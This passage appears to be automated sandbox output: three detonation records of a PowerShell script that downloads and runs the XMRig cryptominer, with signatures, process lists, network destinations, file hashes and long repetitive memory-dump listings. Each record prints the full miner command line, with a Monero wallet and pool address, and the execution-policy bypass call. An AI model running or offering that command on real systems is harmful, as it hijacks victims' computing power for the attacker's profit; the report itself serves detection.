memory/1564-102-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-103-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-104-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-105-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-106-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-107-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-108-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-109-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-110-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-111-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-112-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-113-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-114-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-115-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-116-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-117-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-118-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:30

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical matches, no further details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3900-4-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-5-0x0000027B7C110000-0x0000027B7C132000-memory.dmp

memory/3900-6-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-9-0x0000027B7C2E0000-0x0000027B7C356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zop4j3sg.gvv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3900-20-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-25-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-48-0x0000027B7C2A0000-0x0000027B7C2B2000-memory.dmp

memory/3900-61-0x0000027B7BC30000-0x0000027B7BC3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4908-90-0x0000023B37630000-0x0000023B37650000-memory.dmp

memory/4908-91-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-92-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/3900-93-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-94-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-95-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/4908-96-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-97-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-98-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-99-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-100-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-101-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-102-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-103-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-104-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-105-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-106-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-107-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-108-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-109-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-110-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-111-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-112-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-113-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-114-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-115-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-116-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-117-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-118-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-119-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-120-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-121-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-122-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-123-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-124-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-125-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-126-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-127-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-128-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-129-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-130-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-131-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-132-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-133-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-134-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-135-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-136-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-137-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-138-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-139-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-140-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-141-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-142-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-143-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-144-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-145-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-146-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-147-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-148-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-149-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-150-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-151-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-152-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-153-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-154-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-155-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-156-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:42

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical matches, no further details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

memory/4336-0-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp

memory/4336-1-0x000001B06B100000-0x000001B06B122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jktc3ejw.1sk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-11-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-12-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-14-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-15-0x000001B06BFF0000-0x000001B06C002000-memory.dmp

memory/4336-16-0x000001B06BB20000-0x000001B06BB2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1420-47-0x000001F9C0C50000-0x000001F9C0C70000-memory.dmp

memory/1420-48-0x000001F9C2450000-0x000001F9C2470000-memory.dmp

memory/1420-49-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-50-0x000001F9C2490000-0x000001F9C24B0000-memory.dmp

memory/1420-51-0x000001F9C2470000-0x000001F9C2490000-memory.dmp

memory/4336-52-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp

memory/1420-53-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/4336-54-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/1420-55-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/4336-56-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/1420-59-0x000001F9C2470000-0x000001F9C2490000-memory.dmp

memory/1420-58-0x000001F9C2490000-0x000001F9C24B0000-memory.dmp

memory/1420-57-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-60-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-61-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-62-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-63-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-64-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-65-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-66-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-67-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-68-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-69-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-70-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-71-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-72-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-73-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-74-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-75-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-76-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-77-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-78-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-79-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-80-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-81-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-82-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-83-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-84-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-85-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-86-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-87-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-88-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-89-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-90-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-91-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-92-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-93-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-94-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-95-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-96-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-97-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-98-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-99-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-100-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-101-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-102-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-103-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-104-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-105-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-106-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-107-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-108-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-109-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-110-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-111-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-112-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-113-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-114-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-115-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-116-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-117-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-118-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:31

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical matches, no further details recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/5068-3-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-5-0x0000027F3D220000-0x0000027F3D242000-memory.dmp

memory/5068-8-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-9-0x0000027F3D3D0000-0x0000027F3D446000-memory.dmp

memory/5068-10-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4xkapu1.etg.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5068-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-48-0x0000027F3D3B0000-0x0000027F3D3C2000-memory.dmp

memory/5068-61-0x0000027F3D3A0000-0x0000027F3D3AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5032-90-0x00000167BFB80000-0x00000167BFBA0000-memory.dmp

memory/5068-91-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-92-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5032-93-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5068-94-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5032-95-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-96-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-97-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-98-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-99-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-100-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-101-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-102-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-103-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-104-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-105-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-106-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-107-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-108-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-109-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-110-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-111-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-112-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-113-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-114-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-115-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-116-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-117-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-118-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-119-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-120-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-121-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-122-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-123-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-124-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-125-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-126-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

